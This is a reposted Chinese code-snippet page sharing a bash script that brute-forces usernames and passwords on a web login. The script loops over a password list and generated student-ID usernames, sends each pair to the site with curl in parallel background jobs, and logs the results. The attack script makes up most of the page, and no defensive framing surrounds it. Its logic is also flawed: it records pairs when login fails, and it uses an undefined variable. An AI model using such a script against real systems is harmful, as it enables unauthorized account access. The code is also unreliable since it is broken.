linux下,shell脚本暴力破解用户名和密码

前端之家收集整理的这篇文章主要介绍了linux下,shell脚本暴力破解用户名和密码前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

下面是编程之家 jb51.cc 通过网络收集整理的代码片段。

编程之家小编现在分享给大家,也给大家做个参考。

#!/bin/bash
#
# This script is used to bruteforce crack the password
# Written by Stone Han
# Mail : 
# Date : 19-10-15
#

# where the crack passwds store
passwd_file=passwd_file

cat $passwd_file|while read password;
do
{
	for year in `seq 1 20`
	do
	{
		# -w place 0 at the front of the number,making the numbers with the same digits
		for academy in `seq -w 1 17`
		do
			# sid:form of the username
			sid=$year$academy$number
			html=`curl -s -d "uid=$sid&pd=$password" LOGIN website`
			flag=0				
			# [[ must be usend in bash,LOGIN OK is the symbol of successful login in the response 
			[[ $html =~ "LOGIN OK" ]] && flag=1
			if [ $flag -ne "1" ]
			then
				# store the result in the file result					
				echo $sid $password >> result
				curl -s logoUT website > /dev/null
			fi
		done
		# daemon process
		}&
		done
}&
done
# wait for all the deamon processes finish
wait

以上是编程之家(jb51.cc)为你收集整理的全部代码内容,希望文章能够帮你解决所遇到的程序开发问题。

如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。

猜你在找的Shell相关文章